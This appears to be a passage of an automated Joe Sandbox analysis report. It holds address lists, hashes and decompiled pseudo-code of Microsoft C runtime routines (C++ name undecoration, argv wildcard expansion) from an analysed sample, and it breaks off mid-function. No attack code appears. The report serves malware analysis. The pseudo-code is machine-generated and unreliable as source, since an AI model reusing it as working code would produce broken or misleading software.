                      0x00949c52
                      0x00949c58
                      0x00949c59
                      0x00949c67
                      0x00949c6c
                      0x00949c7c
                      0x00949c88
                      0x00949c90
                      0x00949c94
                      0x00949c9a
                      0x00949c9f
                      0x00949ca3
                      0x00949ca9
                      0x00949cae
                      0x00949cb2
                      0x00949cb8
                      0x00949cbd
                      0x00949cc1
                      0x00949cc7
                      0x00000000
                      0x00949b68
                      0x00949b68
                      0x00949b74
                      0x00949b7a
                      0x00949b7e
                      0x00949b84
                      0x00949b89
                      0x00949b8d
                      0x00949b93
                      0x00949b98
                      0x00949b9c
                      0x00949ba2
                      0x00949ba7
                      0x00949bab
                      0x00949bb1
                      0x00949bb6
                      0x00949bba
                      0x00949bbd
                      0x00949bc2
                      0x00949bc9
                      0x00949bd1
                      0x00000000
                      0x00949bd1
                      0x00949877
                      0x00949877
                      0x0094987e
                      0x00949885
                      0x0094988c
                      0x00949890
                      0x00949893
                      0x00949898
                      0x0094989f
                      0x009498a1
                      0x009498a7
                      0x009498a7
                      0x009498ad
                      0x009498bc
                      0x009498c8
                      0x009498c8
                      0x009498cb
                      0x0094995e
                      0x00949964
                      0x00949967
                      0x00949969
                      0x0094996f
                      0x00949973
                      0x0094997a
                      0x00949980
                      0x0094998d
                      0x0094999d
                      0x009499a3
                      0x009499a8
                      0x009499aa
                      0x00949a09
                      0x00949a14
                      0x00949a1a
                      0x00949a2a
                      0x00949a32
                      0x00949a4d
                      0x00949a4d
                      0x00949a53
                      0x00949a59
                      0x00000000
                      0x00000000
                      0x00949a61
                      0x00949a69
                      0x00949a6b
                      0x00949a74
                      0x00949a7a
                      0x00949a7e
                      0x00949a81
                      0x00949a86
                      0x00949a89
                      0x00949a8b
                      0x00949a8d
                      0x00949a93
                      0x00949a96
                      0x00949a9e
                      0x00949aa2
                      0x00949aa4
                      0x00949aaa
                      0x00949aab
                      0x00949aad
                      0x00949aaf
                      0x00949ab5
                      0x00949a3e
                      0x00949a44
                      0x00949a44
                      0x00949a47
                      0x00949a47
                      0x00000000
                      0x009499ac
                      0x009499ac
                      0x009499b6
                      0x009499ba
                      0x009499c0
                      0x009499c5
                      0x009499c9
                      0x009499cf
                      0x009499d4
                      0x009499d8
                      0x009499de
                      0x009499e3
                      0x009499e7
                      0x009499ea
                      0x009499ef
                      0x009499f6
                      0x009499fe
                      0x00000000
                      0x009499fe
                      0x009498d1
                      0x009498d1
                      0x009498d6
                      0x009498d8
                      0x009498e2
                      0x009498ed
                      0x009498f8
                      0x009498f9
                      0x009498fe
                      0x00949901
                      0x0094990b
                      0x0094990f
                      0x00949915
                      0x0094991a
                      0x0094991e
                      0x00949924
                      0x00949929
                      0x0094992d
                      0x00949933
                      0x00949938
                      0x0094993c
                      0x0094993f
                      0x00949944
                      0x0094994b
                      0x00949953
                      0x00949d79
                      0x00949d79
                      0x00949d7c
                      0x00949d83
                      0x00949d88
                      0x00949d89
                      0x00949d8d
                      0x00949d95
                      0x00949d96
                      0x00949d97
                      0x00949db2
                      0x00949db2
                      0x009498cb
                      0x00000000
                      0x009487ae
                      0x00949d2b
                      0x00949d2b
                      0x00949d31
                      0x00949d42
                      0x00949d4a
                      0x00949d52
                      0x00949d58
                      0x00949d5f
                      0x00949d64
                      0x00949d6e
                      0x00949d73
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 00948A77, 00949D00
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00948A83, 00949D0C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h
                      • API String ID: 3912913270-4241246472
                      • Opcode ID: 493a94ccd00b3167cbb56e19a02d1e2128a2cda0c43534e9f330a75614042a1e
                      • Instruction ID: 584326599e0302bb882b54016026b1fa7b5bec9bc5fd13aa8b7185d24c1ac5d4
                      • Opcode Fuzzy Hash: 493a94ccd00b3167cbb56e19a02d1e2128a2cda0c43534e9f330a75614042a1e
                      • Instruction Fuzzy Hash: 09022575A00208EFCB14DF94D891FEEB7B5BF89310F108199F51AAB291DB706A85CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0096A860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char* _t28;
                      				char* _t29;
                      				char* _t30;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				intOrPtr _t36;
                      				char _t43;
                      				char* _t44;
                      				intOrPtr _t45;
                      				intOrPtr _t79;
                      				intOrPtr _t82;
                      				intOrPtr _t83;
                      
                      				_t86 = __esi;
                      				_t85 = __edi;
                      				_t51 = __ebx;
                      				E0095F3F0( &_v12);
                      				if( *0xb30644 != 0) {
                      					_t28 =  *0xb30644; // 0x0
                      					if( *_t28 != 0x3f) {
                      						L4:
                      						_t29 =  *0xb30644; // 0x0
                      						__eflags =  *_t29 - 0x3f;
                      						if( *_t29 != 0x3f) {
                      							L11:
                      							_t30 =  *0xb30644; // 0x0
                      							__eflags =  *_t30 - 0x3f;
                      							if(__eflags != 0) {
                      								L15:
                      								E0095F820( &_v12, E009644C0(_t51, _t85, _t86, __eflags,  &_v60));
                      							} else {
                      								_t33 =  *0xb30644; // 0x0
                      								__eflags =  *((char*)(_t33 + (1 << 0))) - 0x3f;
                      								if(__eflags != 0) {
                      									goto L15;
                      								} else {
                      									_t34 =  *0xb30644; // 0x0
                      									__eflags =  *((char*)(_t34 + (1 << 1))) - 0x40;
                      									if(__eflags != 0) {
                      										goto L15;
                      									} else {
                      										E0095F920( &_v12, 2);
                      									}
                      								}
                      							}
                      						} else {
                      							_t36 =  *0xb30644; // 0x0
                      							__eflags =  *((char*)(_t36 + (1 << 0))) - 0x24;
                      							if( *((char*)(_t36 + (1 << 0))) != 0x24) {
                      								goto L11;
                      							} else {
                      								E0095F820( &_v12, E00968500(_t51, _t85, _t86,  &_v44, 0));
                      								__eflags = E0096AB70( &_v12) - 2;
                      								if(__eflags == 0) {
                      									L9:
                      									_t79 =  *0xb30644; // 0x0
                      									 *0xb30640 = _t79;
                      									E0095F820( &_v12, E009644C0(_t51, _t85, _t86, __eflags,  &_v52));
                      								} else {
                      									_t43 = E00962290();
                      									__eflags = _t43;
                      									if(_t43 == 0) {
                      										_t44 =  *0xb30640; // 0x0
                      										__eflags =  *_t44;
                      										if(__eflags != 0) {
                      											goto L9;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						_t45 =  *0xb30644; // 0x0
                      						_t96 =  *((char*)(_t45 + (1 << 0))) - 0x40;
                      						if( *((char*)(_t45 + (1 << 0))) != 0x40) {
                      							goto L4;
                      						} else {
                      							_t82 =  *0xb30640; // 0x0
                      							_t83 = _t82 + 2;
                      							 *0xb30640 = _t83;
                      							_v20 = E00960060("CV: ", 4);
                      							_v16 = _t83;
                      							E0095F820( &_v12, E0095FAA0( &_v36,  &_v20, E009644C0(__ebx, __edi, __esi, _t96,  &_v28)));
                      						}
                      					}
                      				}
                      				E0095F240(_a4,  &_v12);
                      				return _a4;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A869
                      • operator+.LIBVCRUNTIMED ref: 0096A8D7
                        • Part of subcall function 0095FAA0: DName::operator+.LIBCMTD ref: 0095FAC0
                      • Mailbox.LIBCMTD ref: 0096A8E3
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A8C6
                        • Part of subcall function 009644C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 009644EB
                        • Part of subcall function 009644C0: Mailbox.LIBCMTD ref: 00964536
                      • Mailbox.LIBCMTD ref: 0096A922
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A959
                      • Mailbox.LIBCMTD ref: 0096A965
                      • DName::operator=.LIBVCRUNTIMED ref: 0096A9B2
                      • Mailbox.LIBCMTD ref: 0096A9D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
                      • String ID: CV:
                      • API String ID: 1608807181-3725821052
                      • Opcode ID: a905ab1b8031b5bf02fae57587cd15625032804105bdd0a03782d3677ad01f62
                      • Instruction ID: 8986820f0516fc25d5140f842a3c39ed7ce234f7a2f73a1eaa02e8d63d941631
                      • Opcode Fuzzy Hash: a905ab1b8031b5bf02fae57587cd15625032804105bdd0a03782d3677ad01f62
                      • Instruction Fuzzy Hash: F841C3B19400149BEB14EFA0D8B3BBE3BB9AFD1301F244169E40767A56DF345A44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00967B30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char _v68;
                      				char _v76;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				void* _t37;
                      				intOrPtr _t40;
                      				intOrPtr _t52;
                      				char* _t54;
                      				intOrPtr _t56;
                      				char* _t66;
                      				char* _t67;
                      				char* _t78;
                      				char _t85;
                      				char _t87;
                      				void* _t92;
                      				void* _t93;
                      
                      				E0095F3F0( &_v28);
                      				_t37 = E0096A1E0(__ebx, __edi, __esi,  &_v52, 1, 0);
                      				_t93 = _t92 + 0xc;
                      				E0095F820( &_v28, _t37);
                      				if(E0096AB70( &_v28) == 0) {
                      					_t78 =  *0xb30640; // 0x0
                      					_t87 =  *_t78;
                      					if(_t87 != 0) {
                      						_t54 =  *0xb30640; // 0x0
                      						_t99 =  *_t54 - 0x40;
                      						if( *_t54 != 0x40) {
                      							_v36 = E00960060("::", 2);
                      							_v32 = _t87;
                      							_t56 = E009675A0(__ebx, __edi, __esi, _t99,  &_v60);
                      							_t93 = _t93 + 0xc;
                      							_v8 = _t56;
                      							_v12 = E0095FB30(_v8,  &_v68,  &_v36);
                      							E0095F820( &_v28, E0095FB70(_v12,  &_v76,  &_v28));
                      						}
                      					}
                      				}
                      				_t66 =  *0xb30640; // 0x0
                      				if( *_t66 != 0x40) {
                      					_t67 =  *0xb30640; // 0x0
                      					_t85 =  *_t67;
                      					__eflags = _t85;
                      					if(_t85 == 0) {
                      						_t40 = E0096A560( &_v28);
                      						__eflags = _t40;
                      						if(_t40 == 0) {
                      							_v44 = E00960060("::", 2);
                      							_v40 = _t85;
                      							_v16 = E0095F350( &_v84, 1);
                      							_v20 = E0095FB30(_v16,  &_v92,  &_v44);
                      							E0095F820( &_v28, E0095FB70(_v20,  &_v100,  &_v28));
                      						} else {
                      							E0095F920( &_v28, 1);
                      						}
                      					} else {
                      						E0095F920( &_v28, 2);
                      					}
                      				} else {
                      					_t52 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t52 + 1;
                      				}
                      				E0095F240(_a4,  &_v28);
                      				return _a4;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00967B39
                      • Mailbox.LIBCMTD ref: 00967B52
                      • Mailbox.LIBCMTD ref: 00967BC8
                      • DName::DName.LIBVCRUNTIMED ref: 00967C35
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 00967C48
                      • DName::operator+.LIBCMTD ref: 00967BBF
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • DName::operator+.LIBCMTD ref: 00967BAC
                        • Part of subcall function 0095FB30: Mailbox.LIBCMTD ref: 0095FB40
                        • Part of subcall function 0095FB30: Mailbox.LIBCMTD ref: 0095FB58
                      • DName::operator=.LIBVCRUNTIMED ref: 00967BFC
                      • DName::isEmpty.LIBCMTD ref: 00967C06
                      • DName::operator=.LIBVCRUNTIMED ref: 00967C14
                        • Part of subcall function 009675A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009675AC
                        • Part of subcall function 009675A0: Mailbox.LIBCMTD ref: 00967604
                      • DName::operator+.LIBCMTD ref: 00967C5B
                      • Mailbox.LIBCMTD ref: 00967C64
                      • Mailbox.LIBCMTD ref: 00967C70
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
                      • String ID:
                      • API String ID: 2733737839-0
                      • Opcode ID: 21463f2bc9964846d8301a76e017eca70799eb42fd044d1db9449bf6df6a9e24
                      • Instruction ID: 752fd54c545ad98ba7f77eac273204500bdc9fb421f06b3577f980b10f4f1498
                      • Opcode Fuzzy Hash: 21463f2bc9964846d8301a76e017eca70799eb42fd044d1db9449bf6df6a9e24
                      • Instruction Fuzzy Hash: BF416F719541099BDB04EFE0DCB2FEEBB79AF94304F14416AE506A7291EB306A48CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00964EA0(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				char _v24;
                      				signed int _v28;
                      				char _v32;
                      				char* _v36;
                      				char _v40;
                      				char* _v44;
                      				char _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				char _v72;
                      				char* _t48;
                      				char* _t79;
                      				signed int _t80;
                      
                      				E0095F3F0( &_v24);
                      				_t48 =  *0xb30640; // 0x0
                      				if( *_t48 == 0) {
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				}
                      				_t79 =  *0xb30640; // 0x0
                      				_v8 =  *_t79;
                      				_v8 = _v8 - 0x30;
                      				if(_v8 > 7) {
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t80 = _v8;
                      				switch( *((intOrPtr*)(_t80 * 4 +  &M00965018))) {
                      					case 0:
                      						_v32 = E00960060("char ", 5);
                      						_v28 = _t80;
                      						E0095F7E0( &_v24,  &_v32);
                      						goto L9;
                      					case 1:
                      						_v40 = E00960060("short ", 6);
                      						_v36 = __edx;
                      						__ecx =  &_v40;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v40);
                      						goto L9;
                      					case 2:
                      						goto L9;
                      					case 3:
                      						_v48 = E00960060("int ", 4);
                      						_v44 = __edx;
                      						__edx =  &_v48;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v48);
                      						goto L9;
                      					case 4:
                      						_v56 = E00960060("long ", 5);
                      						_v52 = __edx;
                      						__eax =  &_v56;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v56);
                      						L9:
                      						_t73 =  *0xb30640; // 0x0
                      						_v16 =  *_t73;
                      						_t57 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t57 + 1;
                      						_v12 = _v16;
                      						_t83 = _v12 - 0x31;
                      						_v12 = _t83;
                      						if(_v12 > 6) {
                      							goto L12;
                      						}
                      						switch( *((intOrPtr*)(_v12 * 4 +  &M00965038))) {
                      							case 0:
                      								goto L11;
                      							case 1:
                      								goto L12;
                      						}
                      					case 5:
                      						L11:
                      						_v64 = E00960060("unsigned ", 9);
                      						_v60 = _t83;
                      						E0095F820( &_v24, E0095FAA0( &_v72,  &_v64,  &_v24));
                      						goto L12;
                      					case 6:
                      						L12:
                      						E0095F240(_a4,  &_v24);
                      						return _a4;
                      				}
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
                      • String ID: char $int $long $short $unsigned
                      • API String ID: 3503010255-3894466517
                      • Opcode ID: 6de13a68525a34cf174277f2cbbb8b2cf5f6e1d55bd4cc327468987315d1abb8
                      • Instruction ID: 9612d596462e1dc0375198772b903892f7fbcbacb7e96181f456fe54ea278d90
                      • Opcode Fuzzy Hash: 6de13a68525a34cf174277f2cbbb8b2cf5f6e1d55bd4cc327468987315d1abb8
                      • Instruction Fuzzy Hash: 3F411FB1D54108EFCB04EFE4D992AEEBBB4AF84301F24816AE90677251EB315A04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E009AD2C0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4, void* _a8) {
                      				char _v6;
                      				char _v7;
                      				char _v8;
                      				signed int* _v12;
                      				char _v16;
                      				signed int _v20;
                      				char _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				intOrPtr* _v36;
                      				char _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				char _v64;
                      				char _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				intOrPtr _v80;
                      				intOrPtr* _v84;
                      				char _v88;
                      				intOrPtr _v92;
                      				char _v104;
                      				void* _t107;
                      				void* _t109;
                      				signed char _t111;
                      				void* _t116;
                      				void* _t134;
                      				signed int _t136;
                      				signed int _t139;
                      				signed int _t143;
                      				void* _t149;
                      				void* _t150;
                      				void* _t151;
                      				signed int _t180;
                      				signed int _t195;
                      				signed int _t198;
                      				void* _t202;
                      				void* _t203;
                      				void* _t204;
                      				void* _t205;
                      				void* _t208;
                      
                      				_t203 = __esi;
                      				_t202 = __edi;
                      				_t151 = __ecx;
                      				_t150 = __ebx;
                      				if(_a8 == 0) {
                      					_v40 = 0;
                      				} else {
                      					_v40 = 1;
                      				}
                      				_v44 = _v40;
                      				_t211 = _v44;
                      				if(_v44 == 0) {
                      					_t149 = L00994930(_t211, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0, L"%ls", L"result != nullptr");
                      					_t204 = _t204 + 0x18;
                      					if(_t149 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v44 != 0) {
                      					 *_a8 = 0;
                      					E009AE400( &_v104);
                      					_v12 = _a4;
                      					while(1) {
                      						__eflags =  *_v12;
                      						if( *_v12 == 0) {
                      							break;
                      						}
                      						_v8 = 0x2a;
                      						_v7 = 0x3f;
                      						_v6 = 0;
                      						_t136 = E009AE300(_v12,  &_v8);
                      						_t208 = _t204 + 8;
                      						_v52 = _t136;
                      						__eflags = _v52;
                      						if(_v52 != 0) {
                      							_t139 = E009ADAE0(_t150, _t202, _t203,  *_v12, _v52,  &_v104);
                      							_t204 = _t208 + 0xc;
                      							_v56 = _t139;
                      							__eflags = _v56;
                      							if(_v56 == 0) {
                      								L17:
                      								_t180 =  &(_v12[1]);
                      								__eflags = _t180;
                      								_v12 = _t180;
                      								continue;
                      							}
                      							_v76 = _v56;
                      							E009AE500( &_v104);
                      							return _v76;
                      						}
                      						_t143 = E009AD8A0( *_v12, _t202,  *_v12, 0, 0,  &_v104);
                      						_t204 = _t208 + 0x10;
                      						_v48 = _t143;
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							goto L17;
                      						}
                      						_v72 = _v48;
                      						E009AE500( &_v104);
                      						return _v72;
                      					}
                      					_v60 = E009AEFB0( &_v104) + 1;
                      					_v32 = 0;
                      					_v28 = E009AE980( &_v104);
                      					while(1) {
                      						_t107 = E009AEAF0( &_v104);
                      						__eflags = _v28 - _t107;
                      						if(_v28 == _t107) {
                      							break;
                      						}
                      						_t134 = E0099BFB6(_v28);
                      						_t204 = _t204 + 4;
                      						_t51 = _t134 + 1; // 0x1
                      						_v32 = _v32 + _t51;
                      						_t198 = _v28 + 4;
                      						__eflags = _t198;
                      						_v28 = _t198;
                      					}
                      					_t109 = E0099B890(_t202, _v60, _v32, 1);
                      					_t205 = _t204 + 0xc;
                      					E0099B460( &_v16, _t109);
                      					_t111 = E0099B520( &_v16);
                      					__eflags = _t111 & 0x000000ff;
                      					if((_t111 & 0x000000ff) != 0) {
                      						_v84 = E0099B6D0( &_v16);
                      						_v64 = E0099B6D0( &_v16) + _v60 * 4;
                      						_v36 = _v84;
                      						_v24 = _v64;
                      						_v20 = E009AE980( &_v104);
                      						while(1) {
                      							_t116 = E009AEAF0( &_v104);
                      							__eflags = _v20 - _t116;
                      							if(_v20 == _t116) {
                      								break;
                      							}
                      							_v68 = E0099BFB6(_v20) + 1;
                      							_v88 = _v32 - _v24 - _v64;
                      							E00994A20(E009AE1E0( &_v24,  &_v88, _v20,  &_v68), _t126, L"traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x175, 0);
                      							_t205 = _t205 + 0x2c;
                      							 *_v36 = _v24;
                      							_v36 = _v36 + 4;
                      							_v24 = _v24 + _v68;
                      							_t195 = _v20 + 4;
                      							__eflags = _t195;
                      							_v20 = _t195;
                      						}
                      						 *_a8 = E0099B5E0( &_v16);
                      						_v92 = 0;
                      						E0099B4C0( &_v16);
                      						E009AE500( &_v104);
                      						return _v92;
                      					}
                      					_v80 = 0xffffffff;
                      					E0099B4C0( &_v16);
                      					E009AE500( &_v104);
                      					return _v80;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t151))) = 0x16;
                      					E00992900(L"result != nullptr", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0);
                      					return 0x16;
                      				}
                      			}

                      APIs
                      • std::exception::exception.LIBCMTD ref: 009AD355
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AD473
                        • Part of subcall function 009AE1E0: __wcstombs_l.LIBCMTD ref: 009AE1FD
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD540
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
                      • String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
                      • API String ID: 3210742261-976376051
                      • Opcode ID: 414043db0be1601bc37d10f78f5d656187b861cb89ec4a4ad3b1e62e65192ca4
                      • Instruction ID: 752b7417765953127a65f4170962db4d08a06e93bbaae52d1c87f9bdbf8f7f29
                      • Opcode Fuzzy Hash: 414043db0be1601bc37d10f78f5d656187b861cb89ec4a4ad3b1e62e65192ca4
                      • Instruction Fuzzy Hash: C5914C70D01208EFDF04EF94D996BEEB7B4BF99308F244419E4067B691EB746A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00941CF0(void* __ebx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
                      				signed int _v8;
                      				char _v2060;
                      				signed int _v2068;
                      				signed int _v2072;
                      				char* _v2076;
                      				char _v2084;
                      				char _v2612;
                      				char _v2616;
                      				signed int _t46;
                      				signed int _t47;
                      				void* _t49;
                      				signed int _t54;
                      				void* _t56;
                      				void* _t63;
                      				void* _t66;
                      				void* _t70;
                      				signed int _t76;
                      				char* _t95;
                      				void* _t97;
                      				void* _t102;
                      				void* _t103;
                      				void* _t104;
                      				signed int _t105;
                      				void* _t106;
                      				void* _t107;
                      				void* _t110;
                      
                      				_t104 = __esi;
                      				_t95 = __edx;
                      				_t70 = __ebx;
                      				_t102 =  &_v2616;
                      				memset(_t102, 0xcccccccc, 0x28d << 2);
                      				_t107 = _t106 + 0xc;
                      				_t103 = _t102 + 0x28d;
                      				_t46 =  *0xa0600c; // 0x5d529087
                      				_t47 = _t46 ^ _t105;
                      				_v8 = _t47;
                      				if( *0xb3368c == 0xffffffff) {
                      					L3:
                      					L17:
                      					E009D14C0(_t105, 0x941f28);
                      					_t49 = _t47;
                      					_t97 = _t95;
                      					return E009D1520(E00957280(_t49, _t70, _v8 ^ _t105, _t97, _t103, _t104), _t105 - _t107 + 0xa34);
                      				}
                      				_t47 =  *0xb3368c;
                      				if(_t47 < _a16) {
                      					goto L3;
                      				}
                      				_t76 =  *0xb2f2f8; // 0xffffffff
                      				_t77 = _t76 & _a12;
                      				if((_t76 & _a12) != 0) {
                      					_t95 =  &_v2060;
                      					E0095AF80(_t103, _t95, 0, 0x800);
                      					_v2068 = 0;
